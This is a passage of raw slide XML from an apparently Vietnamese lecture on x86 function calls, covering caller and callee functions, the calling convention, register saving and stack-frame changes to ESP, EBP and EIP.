                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DF9ECC1-1FEC-7DF2-0F0B-B10A22CDD7C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8" name="Google Shape;178;p24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AC5BB6D-1D94-918F-6E7C-646AFCA2B0B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="352980" y="2141521"/>
            <a:ext cx="2082859" cy="1329564"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="0"/>
            </a:srgbClr>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15000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="120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callee(1, 2)</a:t>
            </a:r>
            <a:b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19" name="Google Shape;179;p24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC5CD644-3782-8251-5BD4-6E26A094F204}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="352980" y="3694837"/>
            <a:ext cx="1869000" cy="492412"/>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GB" sz="2000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>àm gọi</a:t>
            </a:r>
            <a:endParaRPr sz="2000" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Google Shape;180;p24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4C0A3F-F348-81A8-2E84-78F623717F0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="2067654"/>
            <a:ext cx="3703641" cy="147729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 sz="1400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>int</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>nt loc2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	...</a:t>
            </a:r>
            <a:b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r</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eturn 0;</a:t>
            </a:r>
            <a:b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21" name="Google Shape;181;p24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CE485CF-0182-AA95-B553-7E2ED02EB5D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3498742" y="3731626"/>
            <a:ext cx="2636570" cy="492412"/>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sz="2000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Hàm được gọi</a:t>
            </a:r>
            <a:endParaRPr sz="2000" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Google Shape;182;p24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B31E5D08-936D-0FBC-23E8-6D10E11D36E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="3"/>
            <a:endCxn id="20" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2435839" y="2806303"/>
            <a:ext cx="459761" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Google Shape;183;p24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5A86DD7-4C62-2283-ADFF-1D064EC71417}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="20" idx="3"/>
            <a:endCxn id="24" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6599241" y="2806303"/>
            <a:ext cx="346182" cy="5524"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Google Shape;184;p24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE4076E9-EDAB-1E74-634B-33D396BAABA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6945423" y="2147045"/>
            <a:ext cx="1893777" cy="1329564"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="0"/>
            </a:srgbClr>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lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>void caller() {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    callee(1, 2)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    return;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Google Shape;185;p24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B47A432D-C7F8-9D5F-09A1-CDB7DDBF474E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7025708" y="3697420"/>
            <a:ext cx="1869000" cy="492412"/>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GB" sz="2000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Hàm gọi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Google Shape;186;p24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F74021B-2764-D020-6183-5B052CB9CD2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272930" y="4710639"/>
            <a:ext cx="3175200" cy="738633"/>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Hàm</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en"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sym typeface="Arial"/>
              </a:rPr>
              <a:t> gọi(caller) gọi hàm được gọi (callee)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0"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27" name="Google Shape;187;p24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B334881-D815-5E5D-47CC-282C4868366F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325998" y="4710638"/>
            <a:ext cx="3464638" cy="738633"/>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kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Hàm được gọi thực thi, sau đó trả điều khiển về cho hàm gọi</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0"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28" name="Google Shape;188;p24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7ED4399-B410-8B25-FE74-F60E3D256CF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261293" y="1494074"/>
            <a:ext cx="2404426" cy="461635"/>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kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Trước khi gọi hàm</a:t>
            </a:r>
            <a:endParaRPr kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Google Shape;189;p24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77EC0A13-A76E-5F6F-C7DE-D724F7F4AC26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3399417" y="1494073"/>
            <a:ext cx="2806827" cy="461635"/>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GB" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>àm được gọi thực thi</a:t>
            </a:r>
            <a:endParaRPr kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Google Shape;190;p24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591C4A55-FBBC-4D12-1691-C10F475D002E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6436125" y="1477415"/>
            <a:ext cx="2686373" cy="738633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Sau khi hàm được gọi trả về</a:t>
            </a:r>
            <a:endParaRPr kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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396389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4" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="26" grpId="0" animBg="1"/>
      <p:bldP spid="27" grpId="0" animBg="1"/>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ED7E-0EF4-5ABA-BAE9-1B8D3E674FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Quy ước gọi hàm trong x86</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFD766C-37A8-1572-B4AA-6614ECE9C213}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Mô tả cách thức hệ thống xử lý lời gọi hàm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Thứ tự truyền tham số</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Các tham số được đẩy vào stack theo thứ tự ngược với khai báo ở đầu hàm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Trả về kết quả</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Giá trị trả về được gán cho thanh ghi EAX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Thao tác trên thanh ghi: thanh ghi có 2 loại</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Caller-saved: thanh ghi mà hàm được gọi có thể ghi đè lên, bao gồm EAX, ECX, EDX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Callee-saved: thanh ghi mà hàm được gọi không thay đổi giá trị khi trả về, bao gồm các thanh ghi còn lại</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF5404F5-0F2D-D520-3A64-B765DE217072}"/>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944208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A325-A1A7-CD2F-112D-C792FE25F68A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lời gọi hàm trong x86</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4C13574-E702-DD02-71B8-FBA8381A0CD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1115052"/>
            <a:ext cx="8229600" cy="5361948"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>Khi lời gọi hàm được thực hiện, một stack frame mới được tạo ra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Các thanh ghi ESP, EBP dịch chuyển để thao tác trên stack frame mới</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Thanh ghi EIP dịch chuyển tới mã thực thi của hàm được gọi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>Dịch chuyển = Thay đổi giá trị của thanh ghi để trỏ tới ô nhớ mới</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>Khi trả về từ hàm được gọi, các thanh ghi ESP, EBP, EIP khôi phục lại giá trị cũ(trước khi gọi hàm) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{419C1E34-27E4-40B4-1A66-0604B622FF10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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43" name="Google Shape;205;p26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C581F88D-57D8-BEC1-16E0-DB95A80A039D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3608579116"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="935806" y="3333635"/>
          <a:ext cx="1816500" cy="2194280"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1816500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="9E9E9E"/>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>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600" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>caller</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> code</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45700" marR="45700" marT="45700" marB="45700">
                    <a:lnL w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:prstClr val="black"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:prstClr val="black"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="9E9E9E"/>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnT>
                    <a:lnB w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:prstClr val="black"/>
                      </a:solidFill>
                      <a:prstDash val="soli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5"/>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callee</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> code</a:t>
                      </a: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6"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="44" name="Google Shape;206;p26">
            <a:extLst>
